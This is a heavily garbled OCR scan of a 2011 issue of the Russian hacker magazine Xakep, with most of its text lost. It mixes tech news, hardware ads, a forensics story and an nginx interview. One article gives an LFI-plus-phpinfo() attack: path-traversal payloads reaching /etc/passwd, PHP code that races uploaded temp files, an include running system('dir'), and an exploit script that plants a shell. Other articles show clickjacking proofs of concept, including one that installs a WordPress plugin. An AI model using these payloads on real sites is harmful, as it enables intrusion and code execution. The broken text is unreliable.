Xakep 12_2011

: ,

- 1Pv6 - '

N'

www.epidemz.net

www.epidemz.net

MEGANEWS SN

-

soNv ~

S 100

PlayStatio N etwok,

. S Music 8500 .

[iJ , , Sony. Sony (, GeoHot ),

, . , ,

, 7 1 PlayStation Netwok, Sony Ente r tai nment Netwo r k Sony Online Entertainment . 60 PSN/SEN SO E. , n , - .

. Sony, 0,1 % . 93 ,

, . , . , Sony ,

. , . :)

AHTBPYCMICROSOFT SECURIY ESSENTIALS

PWS:Wi32/Zbot Google Chome. . , :).

001.

,

.

, 121 .

, , . 9% .

15 ekko. ekko 30 .

WP7 105 ANDROID ((~~

Windows Phone 7

m , iOS Andoid . - - ,

. Apple Google o r a , , , . , . , Microsoftoe

. , Windows Phone 7

, Wi-Fi

, . . Microsoft , , . ,

, WP 7.5.

MEGANEWS GGL I : Ggl Buzz, Google Labs, GoogleCode Search Jaiku.

EDIFIER

Edifier

17 :

2356740 . - - .

Ed ifier AudioCady 2 IMP17) . . , US- F-,

, SD , ! US-). 17 . 2,4 RMSI

, . Ed ifier 17 AUX. ,

F-. 1300 . Edifier 17 .

, IN,S . , GPS . , . 006

MICROSOFT -

Microsoft, , . , Wld, - Rustock. Microsoft- Kelihos ! lu) 42-45 . Kelihos - . , , DDoS-aa,

>> . Microsoft >>. Microsoft ,

. Kelihos 2011 ,

. -, ,

. sikhl--

MEGANEWS , DRM .

? , !

m Vigilant Defende. Vig il ant Defende , - Deus : Human Revolut ion . , , . ,

, ,

. . , , . , 24% ,

, 25% , . , , . -

, , , $30-40 [ , Deus : Hu man Revo lution $60).

, ORM .

WEXLER.BOOK 6002. WEXLER WLR.6002, 6001 . 6.0" PEARL,

. 4 , 50- 36 . , .

- 1500 mAh, WEXLER.BOOK 6002 .

-5 990 .

008

900

. Deus : Human Revolution

.

.

eBayl ~ , , .

. (20. ,

[NATS).

, . ,

>>. , ,

. , .

. NATS , , . , .

-, .

~ ~ , PAYPALOT

. , . ,

- . PayPal , ,

2,4 3,4% . .

12/155/2011

www.epidemz.net

MEGANEWS FACEBOOK . .

RIW-2011 &,

rn : RIW -. , . ,

ESET, . ,

, Wikileaks.

. , Positive Technologies n , n >> -

. RIW-2011 .

, , RIW 2011 -

- .

, .

- RIW-2011 >> , : . !

71 / - '- 18 / , 8 /- . 010

- RIW2011, :

, , , ,

, , .

12/155/2011

www.epidemz.net

7

BUFFALO MINISTATION PLUS

6

n Buffalo's Backup Utility

n n n Windows. , n

Time Machine, n

05 .

Buffalo MiniStation Plus Manage, n -

. n :

.

12/155/ 201 1

Buffalo MiniStation

Plus n n 1 . n n n

n , .

TurboPC TurboCopy n

n n n n USB 3.0 n

n n .

nn n AES 256 . n

n n

Secue lockMoile .

USB 3.0

n USB , : , n

n , n n

n . n n :

USB.

RAMDISK RAMDISK - Buffalo

n n -

. ,

,

n n.

n .

011

www.epidemz.net

MEGANEWS THEWALLSTREET JOURNAL, Photobucket - .

n .

,

.

, , , . , dt R,

. , , , ,

. , .

. , , . , , . ,

, - . , , ,

- Mafia Was :1.

'al:~e ,t!irate :

30 - ,

30- [ ! . an

. , , . Roland OG, ,

30- iMode la $977 [ 3 0- !. ,

, , , , , ,

.

. , , , ,

- . , , , .

NGIX , 27 100 hm .

50 50

nn.

Belgacom Telenet 11 ,

n The P i a te .

RUNA CAPIAL 3 - NGINX,

. n 43

.

LibeOffice

n n Apple iOS Google Android.

012 12/155/2011

www.epidemz.net

~~ ~~ ~~~6I LTE.

1 So,t~~~--o. .. .~~ ........ _

-2d2-- .

~~ . :1

D Chaos Compute Club ICCC) . , ,

->>. , , , ,

. . , , , , . ,

, .

, , , > .

IE 9 - , Microsoft.

92% URL- 8% .

12/155/2011

S deurrig .

MEGANEWS 9TOSMAC , IPAD 2 Smat v ..

SPYEYE

~ SpyEye ... -.. - -- __ .... --

-...... .......---

1 - .... ... - 1

SpyEye SS ,

n .

Tustee , SpyEye . ,

: SMS , - . it-

, - ,

, . , - , , . : SpyEye

. , , .

, , . ,

, 51 -.

, ,

.

GS-

. . ,

"( - v 5/- .

HAKOMbTECb-DART GGL

Google

,

- Dat ldatlag . g].

DART , , -

. JavaScipt. , D a t JavaScipt,

. , , BSD. Dat . , .

, Web lspecto Dat -. ,

Dat , - ,

. , Dat JavaScipt.

Dat Dat . Google

Dat Chome , , Google Chome 05.

: , .

, .

, . . Dat- , ,

. .

, D at - Google. 2006 Google We b Toolkit,

- Java . , , Adwods Google Wave . Google Web Toolkit .

Dat, Google ...

Dat , , . Dat

, , Google

EUROPEAN SECURITYTEAM 6, , , %.

CHROME

Jt su ('rn)

GOOGLE ,

, Google , . , , Chome. , Chome Remote Desktop, -.

Windows, 05 Linux, hm-. Chome Remote Desktop - Chome. ! - , , . lno

! . - , .

Google , - ,

, . , Google Chome , -.

WebRTC IReal Time Communicationsl, - . Google , WebRTC

- , -

Chrome >

()! nn, ICOII.tepy oroporo r I'IOAIQ'IO&cn.c, IGtO{J(V '. ocryn kOt.O>IOepy' n ' OCJ'YIW.

n

n Chrome '

[1). r n n w, nepealle f Q.....-..

4615 2551 7896

n r .

. ,

. , WR Mozilla. , Goog le Mozilla , .

, Google mViw

, WebRTC. Google , Chome.

, WebRTC , : iSAC iLBC

, - Google V8 . chomium . og ,

2- libjingle, UDP Google.

PseudoTcp- libjingle, . SSL-. potobuf IPotocol Buffesl.

PARKER INGENUITY

,

12/155/2011

PARKER 5 TECHNOLOGY PARKER , .

k STH Techology , , .

, , , .

,

. k

lgeu ity k STH Technology; ,

. k lnguit :

, . ,

,

.

015

www.epidemz.net

HEADER

,

? ,~ , . . - -, Loggly, Spluk

- . . ,

, syslog/syslog-ng, . ,

-, n. -. -, . -,

. , , : - - >>. standaloe-aao Loggly, , Gaylog [www. gaylog2.og/about l,

, MongoBD

. , - Logeplica [ dklab.u/

li/dklab logeplica l. , .

? : Log eplica SSH , . , , , , , . -

. . n : syslog/syslog-ng?, Logeplica

. , n - .

? , - [ ].

-, . , [n ssh-keygen -t sal ,

[ssh-copy-id ootramachine-to-be-pulled]. Logeplica

[/etc/dklab_logeplica . conf], , - , :

016

# , destination = /var/log/cluster

# ( ) skip_destination_prefixes = /var/log : /var/lib/pgsql/data/logs

# scoreboard = /var/run/dklab_logreplica.scoreboard delay = 0. 25

# ~ user = root

# -, # [bles] /var/log/{messages,maillog} /var/log/httpd/*_log

# , [hosts] first=machinel.example.com

[email protected]

. - dklab_logeplica. init /etc/init .d

. /etc/init.d/dklab_logeplica stat>>, logeplica .

? , >> [ www.denwe.u l, [ logeplica

l]. :::

dklab_logreplica 1 dklab_logreplica.pl fj 100755 459 line' (402 elocl 11.112 k

usetrict; ue fcntl ~(:DE~t!l.! :tloc.kJ; use to::Select; F1le::Fat.h;

u flle::htiii.DI!; lt! /Oeu;Jpt::LoQq: u tl1~:st: :IO!S ~(Jid5_Mat :

dJrla_logreplla: ;athtr lOQ3 trc. .ultlple ~r.o~chlllt!s 1ntO ont place 1n t-elltUit.\11" . ""Ver1on: 1.10, 20110'27\n

";\\:t.or:

Co lliJasintsovl

# hacker tweets ~~ rajmj:

Facebook, . .

raDidierStevens: feelpDennisRitchie); pOennisRitchie = NULL; //:-1

El : - . , , Lisp .

raox6D6172696F: . - >.

it.ly/ l bsue . : , , Chome,

la Google). coss-oigin policy!

, , , ;).

$5000

: -

El : . , , .

, : > .

... #nomoefeebugs

JWCIII 12/155/2011

raFishermansEnemy: CISSP,

Metasploit.

rastackSmashing: -2147483647

l ntege.

: live. xakep.u/biog/Hack/2147.html .

El : . , w- . ,

.

rastamparm: Google "'

HEADER

Proof-of-Concept

, . , .

- .

, , t [tcpcypt.og ],

.

? . t . ,

>>: . - ,

. t .

, .

. t,

, , .

t?

? (github.com/ sobo/tcpcypt ) , . ,

(Windows, 05 , Linux, FeeBSD) .

: (4500 ) uselandeoa (7000 LoC).

n

, netsf. i f . , , t .

ni- : ,

70000 60000

.!!! 50000 "' 40000 fj Q) 30000

Generate random master key 20000 ~~~~~~

client server

() 10000

serve

n . .

? 79% t :).

, n.

(lntenet Daft) , , ( n : Ql.L ly/tyvGxs). ,

,

? ( n , NAT), , . ,

t - ( VPN-cepepa).

, ( 36 SSL) .

, .

- t? ,

I- . :::

19,153

tcpcrypt server

737 SSL

server

tcpcrypt : - ,

SSL 82 . tcpcrypt !

018 12 /155/ 2011

www.epidemz.net

! IGROUP i GROUP-IB,

, no . GROUP-IB.

Group-18 ,

. , .

Group-IB

n ! 2 2011 - >> I)

_ _ , ' . -k USB Flash _ ' , . dd l ) w . - ' ' , -

' .

n: ?

' ? ? - ?

LINUX n :

: :

000 >> 3 2011

: 6n -3 2011 l -

>> 000 " , -- > - ynp L ux

' 1 i\ n - .

n . - n -

1 . n n ?

? ' n 2. .. ~

oil ... ? n

w ovo

.

n n . n n n .

n n contestlagroup- ib.ru n >>

n .

! !

www.epidemz.net

COVERSTORY , , Group-18

1

, ! , DDoS,

, ...

- . ,

. ,

.

020

, , ,

.

,

, , ,

.

, ,

. !) . ,

,

,

.

,

, ,

. . 11

, . , : , . ,

, , .

2) , ,

.

. l

. , DLP . DL- . .

4) ,

-. ,

.

. ,

, , . 11 ,

, , :

, .

.

.

, , ! , IPS, DLPI. ,

12/155/ 2011

www.epidemz.net

Caine- Computer Aided INvestigative Environment

. -, .

,

.

.

21 , , , : , , , ,

, .

,

. ,

. - .

Linux:

Caine [http:Uwww.caine-live.net/l, Riplinux [ http:Uip. 7.de/cuent/l .

, CD\DVD US-, .

~

1

,

.

12/155/2011

2

, ,

~

.

3 ,

.

:

I- 8.8.8.8, 000

COVERSTORY , n , Group-IB

, ; [, ]; , . : ,

. ., 12345.

[], DVD, US-, SDHC. Seagate, 3750330NS, 1 23.

\Uss\\Dumnts\ NQ1 NQB n .tt>>.

n n Q\P 2010, 6221, n

, nn n n > n n .

, :

n [, , ] ; [, ]; n ;

n n, .

copiled options :

!

: ,

653 . MicoSDHC, n Tanscend, 16 ,

1234 567. n -

lntenet l n .

nd line: dc3dd if=/dev/sda of=/nt/iage.dd device size : 41943040 sectors (probed) sector size : 512 bytes (probed) 875462656 byt es ( 835 ) i ed ( 47.). 4 . 53218 s . 184 H/s [!!] writing to ' /nt/i.:,ge.dd': tio space left on device 886243328 l1yt es (845 ) i ed ( 4/). 4 . 63351 s . 182 H/s

i nptt t resttl t s for dev i '/dev/sda' : 1730944 sectors in 0 bad sectors replaced zeros

tt t tt t r s tt 1 t s f r f i l / n t / i g . d d : 1730152 sectors ottt

dc3dd failed at 2011-10-19 12 : 56:41 +0000

# dc3dd if=/dev/sda of=/nt/iage.dd

dc3dd 7 . 0.0 started at 2011-10-19 12:57:06 +0 copiled options : nd line: dc3dd if=/dev/sda of=/nt/iage . dd device size: 41943040 sectors Cprobed) sector size: 512 bytes (probed) 1179648 bytes 0.1 ) copied ( 07.), 1.01073 s. 1 . 1 H/s

n RIP Linux

022

, : n \COMP1\HDD1\IE US - , n

ADATA, 1234.

, : n

n n n n ;

n n, -, - . n n;

, , .

, n n n.

[, -n], n n n n, n n , n n n . , n .

:

, :

n , DL , n

. DLP, ,

n n. . n n

. n , , . ,

, , .

12 / 155/2011

www.epidemz.net

: DDOS

, :

, - - > .

-. -,

. - (], ,

.

, 5-1 . .

, .

. . , , .

,

, , : ], .

, : 1)

. 2)

. )

, .:::!:

SONY , ,

12/155/2011

"' AccessData .Eie '[re1v .d !:!\>

&611 ~ O iliii lill e "" -Evidence Tree

tQI :\ I!t System (NTFS]

]root] I!t SBadCius

SExlend SRecycle.Bin : SSecure

android ATI Documents and Settings MSOCache Perflogs Program Files Program Files (86) ProgramOata Recovery System Volume tnformation

Propertie=s'-------------:1 ~ 1

ake O.vnershi:> rue NTFS Aa:ess Control Entry

l Access SID 5-1-5-32-545 Name Users Access Mask 0012009 Execute Fie True Read Data True Wrl:e Data False Append Data False Delete False Read Pemnissions True 01ange Permissions False ake Cmershi:> False NS Aa:ess Control Entry

]

Properties l Vai.Je Inter ... ]Custom Content .. 1 For User Guide ress F1

Access Data F lmager

f .

Name CVRA526.tmp.cvr CVRA606.tmp.cvr CVRA620.tmp.cvr CVRA692.tmp.cvr CVRA853.tmp.cvr CVRAA85.tmp.cvr CVRAADO.tmp.cvr CVRAAE1.tmp.cvr CVRAB8E.tmp.cvr CVRACD4.tmp.cvr CVRB050.tmp.cvr CVRB10.tmp.cvr CVRB1B4.tmp.cvr CVRB226.tmp.cvr CVRB36A.tmp.cvr

CVRA6.tmp.cvr CVRB5BC.tmp.cvr CVRB7CF.tmp.cvr CVRB921.tmp.cvr CVRBAEl.tmp.cvr CVRBDA7.tmp.cvr

CVRBDB.tmp.cvr CVRBE20.tmp.cvr CVRBEBE.tmp.cvr CVRBEE1.tmp.cvr CVRC083.tmp.cvr CVRG4F.tmp.cvr CVRC238.tmp.cvr CVRC26.tmp.cvr

CVRCO.tmp.cvr CVRC371.tmp.cvr CVRC69C.tmp.cvr CVRC813.tmp.cvr CVRC8A1.tmp.cvr CVRC8FA.tmp.cvr CVRC9E5.tmp.cvr

:

Regular File Regular File Regular File 05.09.2011 ... Regular File 06.092011 -Regular File 27.09.2011 ... Regular File 06.09.2011 ... Regular File 18.10.2011 ... Regular File 05.09.2011 -Regular File 28.09.2011 -Regular File 05.09.2011 -Regular File 07.10.2011 ... Regular File 05.09.2011 -Regular File 19.10.2011 ... Regular File 07.10.2011 ... Regular File 12.09.2011 ... Regular File 07.09.2011 ... Regular File 14.09.2011 ... Regular File 25.08.2011 ... Regular File 06.10.2011 ... Regular File 08.09.2011 ... Regular File 23.09.2011 ... Regular File 18.10.2011 ... Regular File 12.09.2011 -Regular File 05.09.2011 ... Regular File 15.09.2011 ... Regular File 27.09.2011 ... Regular File 06.09.2011 ... Regular File 17.10.2011 ... Regular File 02.09.2011 ... Regular File 19.10.2011 ... Regular Fi le 15.09.2011 ... Regular File 27.09.2011 ... Regular File 05.09.2011 ... Regular File 25.08.2011 ... Regular File 14.09.2011 ... Regular File 05.09.2011 ...

, :

.

, ,

, ,

( ] .

.

lc ],

, .

, , , .

023

www.epidemz.net

COVER STORY

www.epidemz.net

& 1994 .

' . 2000

, 11 .

2002 ~l web-cep~ep QI ,

45 .

.

2011 $~: Ngix i . . .

~ n .

NGINX

gi

n , , 1.:;.1 ,

?

&l ~ . ,

[ ] -, 18 . 1987

, , -,

. , - .

>> , ,

, . : , Yamaha ! MSX]. , , 1. , - .

n ~ 1.:;.1 ,

?

&l ~ - AV>>,

1989-1990 . , - 100 . ,

, : , >>, >> ,

. , - . , . : , . -

, 1992- , .

1994 ,

, .

7 , 2000 .

NASDAQ, ,

.

- XXL.RU, ,

, 13 2000

.

025

www.epidemz.net

COVERSTORY

r.1 .... ?

l . ~

: , ,

, , ,- Apache. , mod_gzip

, mod_deflate, Apache 1.3.

mod_poxy. ,

, - .

mod_accel- Apache . 2001 .

r.1 .... ,

?

l , . Mod_defl~te _ ~ ,

, . , , , . 2001

-, Apache. ,

, . -

, , , , , .

Apache- , . :

Apache , . gi Apache . , , nginx .

Apache: ,

, . , - , . - , , : nginx n . ,

- 2002 nginx.

r.1 ....

? ?

l 2003 npo n ~ , , , nginx

n .

026

Rate.ee, . , , . nginx mamba.u zvuki.u, 3.

2004 ft . m.u, , ,

nginx ,

. , , ,

, , . , , . - 2004 , ft.m.u ginx.

4 2004 , ,

: 0.1.0.

r.1 NGINX .... ,

?

l ~ .

. ngix . nginx , . , , nginx,

, ,

. ,

. .

r.1 , .... , ,

?

l - ~ . ,

- . , ginx n >>,

, ,

. nginx, , . -,

n , , -, .

r.1 ~, LIGHPD .... , .

l n: ~

-, n nginx . nginx

. ,

nginx

nginx. , nginx -.

lighttpd (lighty]. - , nginx,

. - (Jan Kneschke]. , - , , .

, , . , lighttpd FastCGI. 2000-2001 , , Apache: , l, Python.

lighttpd - , FastCGI . lighttpd FastCGI . 2000 : .

r.1 ... NGINX ?

l ~ . ~ - . ng1nx

- - no FastCGI WSGI. Apache-

, nginx ,

n FastCGI. , , nginx, Apache. : nginx

, .

, ?

1 , , ~ Apache nginx? ,

, . Apache ,

- , , mod_php. , 100 , , , 100 .

: 1 , , - . 100 , , / (10 /].

, 1 . ,

12 /155/2011

www.epidemz.net

, Apache 10-20 .

, , Apache , , . , . i gi Apache, :

gi , Apache, , . gi , --

, , l

Apache, .- . .).

- , , gi

- gi ,

.

.

1 , - ~ ,

, - . Apache, gi - !- . ,

COVER STORY

r.1 : ~ NGINX.

? . ?

l , n. , ~ , ,

n . , n n , .

, : n .

, , n n n BSD,

n . nginx , . , nginx

, Rate.ee zvuki.u.

r,1 ~ NGINX? l - ~ ,

. , .

, , ,

, . .

Linu-: CentOS, Ubuntu.

, , . :

- , , , .

?

l - . ~

ng1nx - ngix,

. , , , -, .

.

gi.

- (Netcaft, 2011): 64.67%"'"'

keep-alive .

@ 15.660/ -0.07% ,

Ngix

.

8.54/ +o.s1%

gi

-. 100 000 000 000 000

2002 2004

2011 gi $3

: .

gi

87 912 .

.

2011 1.0 gi

70+ .

gi hiig!

Rate.ee - ,

gi.

8 gi

security advisoies.

3 gi

.

.

.

- gi

43 000 000

gi :

"' Ram 1!111 II.I!M

ulu .: ~WORDPRESS @

t. ic Dropox

:

.......

SOU!IS

www.epidemz.net

COVER STORY

!r!AOE IN Cfi!

i

030

R_T_T

,

- -

. , . ,

, ,

.

12/155/2011

www.epidemz.net

,

D ltel ( 2007 ]

,

S-. , , ,

1. AMD

12/155/2011

,

. ,

, . ,

. , ,

, ,

.

. ....:=--------------cvn . . ..

~IA/)~

COVERSTORY

86. ,

,

. .

, - , , - .

, , - .

, . ,

, [ l - .

, , , - . , ,

, ltel

, ...

: , , -

, , lntel. , - ? : Assemed Canada, - Assemied China.

, -

VII\OJI

'1.0 s.

-----

2. lntel

032

, , n . , , , ,

. n

: n ,

. , >>, >>,

>>, , .

, lntel . ,

5000, . , 631xESB/632xESB 1/0 Contolle Hub,

- , 2007

. , . ,

-: ,

,

. [BMCI -

. , - ,

~11"-.~ /3 ""PT'j . ..w 3 .~ ~i

, lntel .

,

. .

: lntel 5000 ,

- ,

. - lntel , ,

.

- , - , , ,

, ,

.

>> - lntel,

, >>. , .

,

COVERSTORY

, . . , . , -

. , ,

. , : , .

, .

, ltel .

, , 7, 11- ,

! -

!. , 11

, V- .

, .

11- , , , .

, , -

. , , , 11- . , !

, - ,

, . , . , ,

, - .

- - ,

, . , .

, ,

ltel, , ,

, . - .

, . , , .

-, .

, .

. ,

------------------ -------------------

, , .

, .

US-, ,

, . l. 31.

, ,- , .

-

!. . 41. - , ltel, , .

. ltel. ,

.

, .

, .

, , ,

,

. , ,

, .

, , ,

. , , . .

. . ,

, .

,

, , , , .

, , , ,

. ,

, . , , .

, . - ,

- , . , , ,

, ,

. , - , ,

-? , ?

12/155/2011

, , . , .

, [ ,

). , , , , . 86, , ,

. , ,

, . , ,

. .

, : . - ,

. -, -,

,

.

COVERSTORY poma lpomawkelagmail .co,;,l

I LFI

phpinfo[) . .

LFI-ATAKY

036

phpifoll 10% .

J!hi!,.ng! - ; bjt i/q LFI; bjy/ccFHcYphpinfoll ; it.ly/omkMVP LFI phpinfoll

RDot; it.ly/YP9LE BWMeter; bjy/eS4GxW Procmon.

. ,

, .

PERL ,

.

, , local lile i clude, ,

. . , . , , .

LFI, .

. -: , - local lile inclusion ... php.ini - , ? , - , ! LFI -aa ,

, - n.

LFI: 1. [, , . .l.

[ , !.

2. 1/apache/logs/eo.log, /va/log/access_log, // self/envion, /poc/self/cmdline, /poc/sell/ld/X !.

, , . n CG I

/ , .

3. nn [data:, php://input, php://fi l te l, allow_ul_include=On [n-0111 >= 5.2.

4. 1/tmp/sess_*./va/li/php/session/1. , .

5. . S n www-, [ ./v/sl/ maill .

12/155/2011

www.epidemz.net

tm-

, LFI (/tmp/php*, C:\tmp\php*l . / :

LFI-; phpinfo(l; - n Windows (

!; > 5.2.0.

n ( , - , !: 1. - h-n phpinfo[J,

(tmpl . 2. phpinfo[J

seed ! ! . .

(, Content-Lengthl, L

4. tm- LFI.

. . , :

http://site.com/css.php?file=style.css http:J/site.com/css.php?file= .. / . . /( . )/etc/passwd

, css.php:

n , , n , . *nix Windows:

http: 1 /si te. com/css. php?file= .. 1 .. 1 . .} .. 1 . . /etc/passwd ht tp://site.com/css.php?fi l e= .. / . . / . . / . . / .. /tmp/ http://site.com/css.php?file= .. / .. / .. / .. / .. \Windows\Temp\

12/155/2011

phpinfo

- tm -

PHPINFO() n n phpinfo[J. n

, n php.ini , n .

n : 1. upload_tmp_di-peea ,

. (NULLI, Envionment.EMP.

2. file_uploads-a n upload_tmp_di ! n n Onl. . upload_max_filesize-aca .

( 10 l, n 2 .

4. max_execution_time-acaoe n . , , n , n . :-1

5. session.seialize_handle-cepaaop . -h ( !.

, phpinfo[J n , n Vesion 5.3.8.

$_FILES n n ( RFC1867I: 1. . 2. n - .

. tm- n . 4. . 6. - . 7. nn -. 8. l nu ( ! . 9. - n , .

3, 4, 5, 6, 7 tm- , n 8 . -n $_FILES, n nn

move_uploaded_file[J. , n

n, , . n,

, cleanup. , ,

, , n . , -n ( _* ob_stat, ob_flush !, , n 8 9,

n . n

037

www.epidemz.net

COVER STORY

DOS LFI + PHPINFO[] _FILES, , . . , - ?

? . . ,

30 , , . ,

. ( + ) .

. , . . S-- file_upload php.ini.

, . phpinfo(],

tm- , , LFI , cleaup . ,

, . , ?

, LFI , . >- , . , . , , . , . :1 :

Cotet-Legth [ );

[, ------------BWvJ N Ml.

, : 1. . 2. [ ). 3. ,

.

2 , . , , , , ,

.

,

. phpinfo[l .

[phpifo.php, info.php, i.php . .), G elwaux [ ). , . . Vaiaes phpifo[)

038

PHPINFO[]

n - phpinfo(l , .

, .

, n n , phpinfoll: 1. , / , ; 2. dumnt_t-,

; 3. _lg - [ LFI); 4. safe_mode [default OFF)- ; 5. open_basedi [default mt)- ,

; 6. allow_ul_fope [default ON)- URL

; 7. allow_ul_include [default OFF) - ;

. magic_quotes_gpc [default OFF) - ;

9. egiste_globals [default OFF)- ; 10. disae_functions [default empty) -

; 11. max_execution_time [default 0)-

; 12. display_eos [default OFF) - ; 13. upload_tmp_di-y tm-. 14. [cul, sockets, zip . .); 15. : _G ET, _POST, _COOKI E,

FILES, _SERVER.

: _GET, _POST _FILES. [

phpinfo

! Administrator: C:\Windows\ System32\cmd.exe

t ~ tll ,, J ' ' ' 1 1 1, t 1 ' ' ; ~ ' ' - ~ \ ') l \.' 1' i '~ ' j 1 1 '1 ! 1' 1 ; ~ 1; "- ..,_

J { l t 1 '1' 1 f ' - ' ' ' : J 1 1 - 1:1'' '.

w

\ .TMP

= C:\Windows\Temp ( upload_tmp_dir php.ini), = php (sessio.ser.ialize_handler), = .

, Windows , :

phplAE.tmp phplAF.tmp php;t.A4~.tmp

*nix mkstemp [linux.die.net/man/3/mkstemp):

/ = / tmp,_ = php (session.seria1ize_handler), =. (seed += PID). . glibc

:

- t_ime () - gettimeofday().sec

COVER STORY

, . , , ,

-. , phpifoll , .

1000000*36 , .

. , Micosoft-IIS/7. 5 /5.3.8 .

Widows-cepepa css.php LFI:

phpinfo.php:

, tm-:

- S- - :

// Evil $file="-----------------------------XaXbXaXbXaXbXa\r\n" ; $file .="Content-Disposition: form-data; name=file" .rand(e, 100)." ; filename=\r\nfile" . rand(e, 100). ". txt\r\n" ; $file.= "Content-Type: text/plain\r\n\r\n" ; $file.= "\r\n" ; $fi:J,e.="------------------------ - ----XaXbXaXbXaXbXa\r\n" ; $post = $file; $req ="POST " .$target. " /1.8\r\ " ; $req.= "Host: " .$host. "\r\n" ; $req.= "Content-Type: multipart/form-data;

boundary=---------------------------XaXbXaXbXaXbXa\r\n"~ $req. ="Content-Length: _" . strlen($post). "\r\n" ; $req.= "Connection: Close\r\n\r\n" ; $req.= $post;

:

$tmp = '' ; $html = '' ; $sock = socket_create(AF_INET, SOCK_STREA, SOL_TCP); socket_connect($sock, $host, ); socket_write($sock, $req); while ($out = socket_read($sock, 65536 )) {

01,0

$html .= $out; if(preg_match_all( '#=> (. *)#' ,$html,$r) &&

! empty($r[e][ 2])) {

$tmp = str _replace( array ( "=> " , ' ' ), $r[e]( 2]); }

socket_close($sock);

$html phpifo, $tmp- tm-. :

$tmp_hex = $tmp; if(strpos($tmp_hex, ': ' )) {

$path = explode( ' : ' ,$tmp_hex); $tmp_hex = $path[1]; } $tmp_hex = ($tmp_hex &&

preg_match(' #php(. *)\. tmp#' ,$tmp_hex,$rd)) ? $rd[1] : '' ;

$tmp_hex seed . - . . Content-Length ! , ! :

$req = substr($req,e,strlen($req)-2); retname($host,$req);

n . , n .

$tmp_hex +1 LFI. ? , . , , , - , .

. +2, +3 . . , ,

, tm-, 1 100.

LFI . -:

ttp://site.com/css.php?file= .. / .. / .. /tmp/ php7xEkH&e=system( 'dir')

:

php expl.php step4 .. / .. / .. /tmp/php7xEkH.tmp http://site.com/s.txt

here your shell : http://site.com/8149. php

expl.php- , .

, phpinfoll . , Live, magic_quotes=o ./supe . Windows-aax , i*- BWMete . ,

- - . , . ::

12/155/2011

www.epidemz.net

Preview PCZONE

IPV6:HOWTO 50 ~ 1Pv4 .

. 1Pv6! , . I . ~

, . .

/ ? NAT 1v4-.

1Pv6,

PCZONE

5 , ves i on1, ve sion2, ve sion2a,

. ,

. , hello wold ,

. 15 ,

, - Git !

01,2

GIT? Git- ,

, Linux. : n , n n n . Git'a n .

: Git , .

, , , - . , , , , , , IDE. -

. .

Git

, , , . Linux git . ' , , n - git-osx-installe. Windows

, ) - ). Git

Windows, , , . Git . GitG Git, IDE git, , ,

. Git . commit. n. commit , ) ). n

:

git config --global user.name "Your Name" git config --global user.email "your@emai l .com"

, :

git config --global color.diff auto git config --global color.status auto git config --global color.branch auto

12 / 155/2011

www.epidemz.net

commit

n commit'a:

git commit -m "initial commit"

- > - staging commit . Git staging

. :

git commit -am 'update to index.php'

git status . . commit, ,

. , , . , ,

>, - , - .

git branch 1 git checkout n , . : n , ,

. , , . Git ,

. banch,

, , .

git branch

PCZONE

Add return ln the offset support tests lf the d ls not present ln fra ... ... meset docs

Browsecode

tlmmywll authored 2 days ago 1 parent 52afe20860 commit 969fcc16bc5ab77352407f77cd48860ca4d95434

Showing 1 changed file wlth 6 addltions and deletlons.

s rc/support . js 6

src/support. js Vlow fllo@ 969fccl

266 266 267 267 268 ~

2 269 275

'' -266,6 266,12 @@ jQuery.support (f~~ctio~() {

+ +

+ + +

+

11 Reconstruct container d document.getlementsByagName("ody") [ O]; if ( Iody ) {

/1 Return for frameset docs that don't have d 11 These tests cannot done return;

container document.createBlement ("div"); 270 ?71

276 277

container.style.cssext v + "width:O;height:O;position:static;top:O;marginop: " + conarqinop + " " ; ody.insertefore( container, ody.firstChild );

r

, banch , :

git branch experimentalBrunch

, n Git l - mst- l.

, . open souce>> , Sign Up>> . ,

n SS-. , -, ! u) Gitu-. Puic Keys>> Add anothe puiic key>>. .

n SSH , . , , . , . - l help . github . com/woking-withkey-pass-phases ) .

git clone Git , GitHub- .

, - , l, , - , ). GitHub . jQuey. Gitu-, clone URL>>. URL , l Git-

) n, clone:

git clone git : //githui:J.co!/jquery/jquery.git

Git jquery . , - n gitk -all>>.

git push .

git, . ' GitHub

I), . , -

. GitHub puiic clone URL>> , , pesonal clone URL>> . GitHub .

git remote add origin git@github . com :aburgess/My-First -GitHub-Repo.git git push origin master

. oigi pivate clone URL>>. - git-push- maste oigin l. . GitHu.

, . Gitu- .

git pull push' , git pull , . : git fetch ! ) get mege l ):

git fetch upstream master git merge upstream/master

12/155/2011

Git&GitHub:

mitsuhiko (Armin Ronacher)

lm.ti~ICI>ve-

PCZONE

CLICKJACKING: , , , : , ? ,

. ,

, -

.

.

, -

- .

: www.sectheory. com/clickjackjnq.htm: www.contextis. com/resources/ white-papers/click-klna;

~ com/201 0/paoers/ J!Z1J!!!f; www.owasp.org/ index.pho/Cijckjack ing.

. n.

CLICKJACKING? ,

. click jackig , - >> . , , ! ?

L- , : -

; L- ,

; L- ,

z - i d ex .

, L- ! ,

, iframe, , . iframe

- , .

, , iframe, SS- opaci ty

12/155/ 2011

www.epidemz.net

facebook ~

Girl who had sex with 5000 men 1 1 Uk l Wall lnfo Glrl

Securlty Oleck ,

Waningl Due to the 1ncreased number of spam ots punna extra load our srrvers. please v11fv that you are real HUMN Foflow the insrructions below to proceed.

Clitk buttons in th is orde:r. 3. 1. 2

1 2

""

z-idex. , , . , , , .

(55-- .

? clickjacking-apyo.

, , :

chtml> chl style= "text-alig:ceter" >owo yw style=" fot-size: 38;" >! r> !/> cdiv style= "z-idex:le; opacity:e; positio:absolute; top:epx; " > ciframe scrolling="no" style= "width:eepx; height:seepx;"

src= "http://www .g.com/search?q=buy+kidle+amazo" > ! - - iframe -->

href= "#" >Ka ?/>

, Bing'a.

. , - . , , , Retwit Like,

, . , .

12 /155/2011

HIXOIICA n

r

ni -i l'tOI'IHOCO lframe

anK corn

" ns.

100 200

.nn , :s n Next.

i.

, , - - ?

, -, . , , -,

- WodPess . , . - WodPess'o, ,

. , lnstall Now [, , Fiefox). . http://wordpress/wp-admin/

plugin-install.php?tab=plugin-informatio&plugin=wp-galleryremote, plugi

. , ifame

lnstall Now. - . , , [ ). . , [ zi-)

URL: http://wordpress/wp-content/plugins/.

. , ? - . -

. , 51idePress, 55- . , .

[ n ) [secuity-assessment.com ). WordPess 3.1.3 2011 .

[- l), clickjacking-aa. .

01,7

www.epidemz.net

PCZONE

(i! 11@) C:\Usrs\ ondrew\ 0 ~ C:\Usrs\ ondrew\ Dosktop\s ... L ..J WordPress.org Login Page In Frame

This content cannot displayed in frame help protect the se

- . .

